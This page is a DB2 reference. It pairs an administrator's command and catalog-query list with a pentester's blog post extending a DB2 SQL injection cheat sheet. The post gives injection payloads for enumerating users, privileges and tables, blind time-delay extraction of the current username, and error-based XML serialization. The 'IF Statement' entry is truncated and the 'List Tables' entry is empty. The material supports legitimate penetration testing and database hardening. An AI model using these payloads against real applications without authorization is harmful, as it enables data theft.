DB2 useful commands
DB2LEVEL -- checks the version of DB2 installed
DB2ILIST -- lists all instances installed
DB2CMD -- opens a command line processor
DB2CC -- opens the DB2 Control Center
DB2LICM -l -- gets the DB2 product/licence type

DB2 LIST NODE DIRECTORY -- lists all nodes
DB2 CATALOG TCPIP NODE DB2NODE REMOTE MACHINE215 SERVER 50000 -- catalogs a node. In this case the node is DB2NODE on the machine named MACHINE215, port 50000.
DB2 LIST DATABASE DIRECTORY -- lists databases
DB2 GET DB CFG FOR SAMPLE -- gets configuration info for the SAMPLE database
DB2 CONNECT TO alexDB USER myuser USING mypass -- connects to a database. In this case the database is alexdb, the username is myuser and the password is mypass.
DB2 DISCONNECT alexdb -- disconnects
DB2 LIST APPLICATIONS SHOW DETAIL -- shows all applications currently connected to databases
DB2 GET DBM CFG -- view the authentication parameter (e.g. something like SERVER_ENCRYPT)
DB2 UPDATE DBM CFG USING AUTHENTICATION SERVER_ENCRYPT -- alters the authentication mechanism to SERVER_ENCRYPT
DB2 GET AUTHORIZATIONS -- gets the authorisation level
DB2 GET DATABASE CONFIGURATION -- gets the current database configuration
DB2 VALUES CURRENT USER -- gets the current user
DB2 VALUES CURRENT SCHEMA -- gets the current schema
Schemas
DB2 SELECT SCHEMANAME FROM SYSCAT.SCHEMATA -- lists all schemas
DB2 VALUES CURRENT SCHEMA -- gets the current schema
DB2 SET SCHEMA ALEXSCHEMA -- sets the schema
Tables
DB2 LIST TABLES FOR schema_name -- lists all tables for a particular schema
DB2 LIST TABLES SHOW DETAIL; -- shows detail about tables
DECLARE GLOBAL TEMPORARY TABLE -- declares a temporary table
CREATE TABLE MQT AS (SELECT c.cust_name, c.cust_id, a.balance FROM customer c, account a WHERE c.cust_name IN ('Alex') AND a.customer_id = c.cust_id) DATA INITIALLY DEFERRED REFRESH DEFERRED -- creates a materialised query table. In this case the MQT is based on a join query over the customer and account tables.
Tablespaces
DB2 LIST TABLESPACES SHOW DETAIL -- shows detail about tablespaces
SELECT * FROM SYSCAT.TABLESPACES; -- shows what SYSCAT has about tablespaces
SELECT TBSPACE, BUFFERPOOLID FROM SYSCAT.TABLESPACES; -- gets tablespace and bufferpool id
SELECT TABNAME FROM SYSCAT.TABLES WHERE TBSPACEID=2; -- checks which tables are in the tablespace with id = 2
Constraints
SELECT * FROM SYSCAT.TABCONST; -- table constraints
SELECT * FROM SYSCAT.CHECKS; -- check constraints
SELECT * FROM SYSCAT.COLCHECKS; -- columns referenced by check constraints
SELECT * FROM SYSCAT.REFERENCES; -- referential constraints
Sequences
CREATE SEQUENCE STESTRESULT AS INTEGER INCREMENT BY 1 START WITH 1 NO MINVALUE NO MAXVALUE NO CYCLE CACHE 10 ORDER; -- creates a sequence starting at 1 that caches 10 values
SELECT * FROM SYSCAT.SEQUENCES; -- gets SYSCAT info on sequences
VALUES NEXT VALUE FOR MYSEQ; -- gets the next value from sequence MYSEQ
ALTER SEQUENCE MYSEQ RESTART WITH 11 INCREMENT BY 1 MAXVALUE 10000 CYCLE CACHE 12 ORDER -- changes the MYSEQ sequence
Locksize
SELECT TABNAME, LOCKSIZE FROM SYSCAT.TABLES WHERE TABNAME = 'EMPLOYEES'; -- checks the locksize, which can be tablespace, table, partition, page or row (usually row)
Bufferpools
SELECT bpname, npages, pagesize FROM syscat.bufferpools; -- gets useful bufferpool info
SELECT buffer.bufferpoolid, buffer.bpname, buffer.npages, buffer.pagesize, tablespace.tbspace, tablespace.tbspaceid FROM syscat.bufferpools buffer, syscat.tablespaces tablespace WHERE tablespace.bufferpoolid = buffer.bufferpoolid; -- gets bufferpool and corresponding tablespace info
Indexes
SELECT * FROM SYSCAT.INDEXES; -- shows all indexes
SELECT COLNAMES, TABNAME, INDEXTYPE, CLUSTERRATIO, CLUSTERFACTOR FROM SYSCAT.INDEXES WHERE TABNAME = 'TPERSON'; -- some useful columns
Functions
SYSDUMMY1 commands
SELECT CURRENT DATE FROM SYSIBM.SYSDUMMY1; -- gets the current date
SELECT HEX(36) FROM SYSIBM.SYSDUMMY1; -- same as VALUES HEX(36)
Runstats
RUNSTATS ON TABLE TAUSER1.TOSUSER FOR INDEXES ALL; -- runstats for all indexes

Checking the last time RUNSTATS was run:
SELECT CARD, STATS_TIME FROM SYSCAT.TABLES WHERE TABNAME = 'TOSUSER';
SELECT NLEAF, NLEVELS, FULLKEYCARD, STATS_TIME, TABNAME, INDNAME FROM SYSCAT.INDEXES WHERE TABNAME = 'TOSUSER';

The following catalog columns can be queried to determine whether RUNSTATS has been performed on the tables and indexes:
- If the CARD column of the SYSCAT.TABLES view holds -1, or the STATS_TIME column is NULL for a table, then the RUNSTATS utility has not run for that table.
- If the NLEAF, NLEVELS and FULLKEYCARD columns of the SYSCAT.INDEXES view hold -1, or the STATS_TIME column is NULL for an index, then the RUNSTATS utility has not run for that index.
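The two catalog rules above turned into schema-wide queries, as an added example that is not part of the original cheat sheet: they list every user table and index in one schema that has never had RUNSTATS, or whose statistics are older than a threshold, and generate the RUNSTATS commands to fix it. The schema name TAUSER1 is reused from the RUNSTATS line above; the 30-day staleness window is an assumption.

```sql
-- Added example (not from the original page). Uses the rules stated above:
-- CARD = -1 or STATS_TIME IS NULL means no statistics for a table;
-- NLEAF/NLEVELS/FULLKEYCARD = -1 or STATS_TIME IS NULL means none for an index.
-- Schema TAUSER1 comes from the RUNSTATS line above; 30 days is an assumed threshold.

-- 1. User tables (TYPE = 'T') with no statistics, or statistics older than 30 days
SELECT t.tabschema, t.tabname, t.card, t.stats_time,
       CASE WHEN t.card = -1 OR t.stats_time IS NULL THEN 'NEVER'
            ELSE 'STALE' END AS stats_state
FROM   syscat.tables t
WHERE  t.tabschema = 'TAUSER1'
  AND  t.type = 'T'
  AND (t.card = -1
       OR t.stats_time IS NULL
       OR t.stats_time < CURRENT TIMESTAMP - 30 DAYS)
ORDER BY t.stats_time NULLS FIRST, t.tabname;

-- 2. Indexes in the same schema with no statistics at all
SELECT i.tabname, i.indname, i.nleaf, i.nlevels, i.fullkeycard, i.stats_time
FROM   syscat.indexes i
WHERE  i.tabschema = 'TAUSER1'
  AND (i.nleaf = -1 OR i.nlevels = -1 OR i.fullkeycard = -1
       OR i.stats_time IS NULL)
ORDER BY i.tabname, i.indname;

-- 3. Generate the RUNSTATS commands for every table found by query 1 that has
--    never been analysed; feed the output to the DB2 command line processor
SELECT 'RUNSTATS ON TABLE ' || RTRIM(t.tabschema) || '.' || RTRIM(t.tabname)
       || ' FOR INDEXES ALL;' AS runstats_cmd
FROM   syscat.tables t
WHERE  t.tabschema = 'TAUSER1'
  AND  t.type = 'T'
  AND (t.card = -1 OR t.stats_time IS NULL);
```

Filtering on TYPE = 'T' keeps views and aliases out of the list (they never carry statistics), and NULLS FIRST puts the never-analysed tables at the top of the first result set.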
Note: there is a Spanish version of this post here.

I'm sure we all (pentesters) make extensive use of pentestmonkey's SQL injection cheat sheets. They are touchstones when it comes down to SQL injection, and most of the time they save the day. However, the DB2 cheat sheet is one of the less complete ones on pentestmonkey's website. It might be because it's not a very common database engine and a fairly complex one. I've had the luck(?) of coming across lots of DB2 systems in my last and also in my current job. Hence the missing information was extremely annoying.

Following these lines there is a table with an updated DB2 SQL injection cheat sheet, using pentestmonkey's as a starting point. The updated/modified or new fields are marked with an asterisk (*). All of these queries have been tested on Win32 + DB2 v10.1.0, although I've also had the chance to test some on z/OS + DB2 v9.x and v8.x and most of them work fine. Please note that I'm not a DB2 expert, so if you find errors or inaccurate information, or you know other exciting tricks, please feel free to contact me. Finally, I've uploaded some DB2 dumps of default privileges, tables with PUBLIC access, and other interesting stuff.
Version*
  select service_level from table(sysproc.env_get_inst_info()) as instanceinfo
  select getvariable('sysibm.version') from sysibm.sysdummy1 -- (v8+)
  select prod_release, installed_prod_fullname from table(sysproc.env_get_prod_info()) as productinfo
  select service_level, bld_level from sysibmadm.env_inst_info

Comments
  select blah from foo -- comment like this (double dash)

Current User
  select user from sysibm.sysdummy1
  select session_user from sysibm.sysdummy1
  select system_user from sysibm.sysdummy1

List Users*
  DB2 uses OS accounts. Those with DB2 access can be retrieved with:
  select distinct(authid) from sysibmadm.privileges -- priv required
  select grantee from syscat.dbauth -- incomplete results
  select distinct(definer) from syscat.schemata -- more accurate
  select distinct(grantee) from sysibm.systabauth -- same as previous

List Password Hashes
  N/A (OS user accounts)

List Privileges
  select * from syscat.tabauth -- shows privs on tables
  select * from syscat.tabauth where grantee = current user -- shows privs for the current user

List DBA Accounts*
  select distinct(grantee) from sysibm.systabauth where CONTROLAUTH='Y'

Current Database
  select current server from sysibm.sysdummy1

List Databases*
  select distinct(table_catalog) from sysibm.tables

List Columns*
  select name, tbname, coltype from sysibm.syscolumns -- also valid with syscat and sysstat

List Tables

Find Tables From Column Name
  select tbname from sysibm.syscolumns where name='username'

Select Nth Row*
  select name from (select * from sysibm.systables order by name asc fetch first N rows only) order by name desc fetch first row only

Select Nth Char
  select substr('abc',2,1) from sysibm.sysdummy1 -- returns b

Bitwise AND/OR/NOT/XOR*
  select bitand(1,0) from sysibm.sysdummy1 -- returns 0. Also available: bitandnot, bitor, bitxor, bitnot

ASCII Value -> Char
  select chr(65) from sysibm.sysdummy1 -- returns A

Char -> ASCII Value
  select ascii('A') from sysibm.sysdummy1 -- returns 65

Casting
  select cast('123' as integer) from sysibm.sysdummy1
  select cast(1 as char) from sysibm.sysdummy1

String Concat
  select 'a' concat 'b' concat 'c' from sysibm.sysdummy1 -- returns abc
  select 'a' || 'b' from sysibm.sysdummy1 -- returns ab

IF Statement*
  'BBBBBBBBBB' END from sysibm.sysdummy1

Avoiding Quotes*
  SELECT chr(65)||chr(68)||chr(82)||chr(73) FROM sysibm.sysdummy1 -- returns ADRI. Works without select too

Time Delay*
  Heavy queries, for example:
  and (SELECT count(*) from sysibm.columns t1, sysibm.columns t2, sysibm.columns t3)>0 and (select ascii(substr(user,1,1)) from sysibm.sysdummy1)=68
  If user starts with ASCII 68 (D), the heavy query will be executed, delaying the response. However, if user doesn't start with ASCII 68, the heavy query won't execute and thus the response will be faster.

Serialize to XML (for error based)*
  select xmlagg(xmlrow(table_schema)) from sysibm.tables -- returns all in one xml-formatted string
  select xmlagg(xmlrow(table_schema)) from (select distinct(table_schema) from sysibm.tables) -- same but without repeated elements
  select xml2clob(xmlelement(name t, table_schema)) from sysibm.tables -- returns all in one xml-formatted string (v8). May need CAST(xml2clob(...) AS varchar(500)) to display the result.

Make DNS Requests
  N/A

Command Execution
  Seems it's only allowed from procedures or UDFs.

Local File Access
  I think this is only available through stored procedures or the db2 tool.

Hostname/IP and OS Info*
  select os_name, os_version, os_release, host_name from sysibmadm.env_sys_info -- requires priv

Location of DB Files*
  select * from sysibmadm.reg_variables where reg_var_name='DB2PATH' -- requires priv

System Config*
  select dbpartitionnum, name, value from sysibmadm.dbcfg where name like 'auto_%' -- requires priv. Retrieves the automatic maintenance settings in the database configuration that are stored in memory for all database partitions.
  select name, deferred_value, dbpartitionnum from sysibmadm.dbcfg -- requires priv. Retrieves all the database configuration parameter values stored on disk for all database partitions.

Default System Databases*
  What makes sense for DB2 is to know the default system schemas (and maybe tables): SYSIBM / SYSCAT / SYSSTAT / SYSPUBLIC / SYSIBMADM / SYSTOOLS
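Seen from the administrator's side, the "List Privileges", "List DBA Accounts" and "tables with PUBLIC access" entries above describe exactly what a privilege review should look for. The following queries are an added example, not part of the original post or of pentestmonkey's sheet: they enumerate grants to PUBLIC outside the system schemas listed under "Default System Databases", accounts holding CONTROL on tables, and database-level authorities, so that over-grants can be found and revoked before an attacker's catalog queries find them. Column names are those of SYSCAT.TABAUTH and SYSCAT.DBAUTH.

```sql
-- Added example (not from the original post). Privilege review queries built
-- on the same catalog views the cheat sheet above reads.

-- 1. Table privileges granted to PUBLIC (a group, GRANTEETYPE = 'G') on
--    anything outside the default system schemas named above
SELECT tabschema, tabname,
       selectauth, insertauth, updateauth, deleteauth, controlauth
FROM   syscat.tabauth
WHERE  grantee = 'PUBLIC'
  AND  granteetype = 'G'
  AND  tabschema NOT IN ('SYSIBM', 'SYSCAT', 'SYSSTAT',
                         'SYSPUBLIC', 'SYSIBMADM', 'SYSTOOLS')
ORDER BY tabschema, tabname;

-- 2. Every grantee holding CONTROL on a table (the "List DBA Accounts"
--    query above, aggregated per account) with the number of tables controlled
SELECT grantee, granteetype, COUNT(*) AS tables_controlled
FROM   syscat.tabauth
WHERE  controlauth = 'Y'
GROUP BY grantee, granteetype
ORDER BY tables_controlled DESC, grantee;

-- 3. Database-level authorities: who can administer the database, manage
--    security, or run LOAD. GRANTEETYPE 'U' = user, 'G' = group, 'R' = role.
SELECT grantee, granteetype,
       dbadmauth, securityadmauth, loadauth, connectauth
FROM   syscat.dbauth
WHERE  dbadmauth = 'Y' OR securityadmauth = 'Y' OR loadauth = 'Y'
ORDER BY grantee;
```

A value of 'G' in the *AUTH columns means the privilege was granted WITH GRANT OPTION, which is worth flagging separately; any row in query 1 is a candidate for REVOKE ... FROM PUBLIC unless the table is meant to be world-readable.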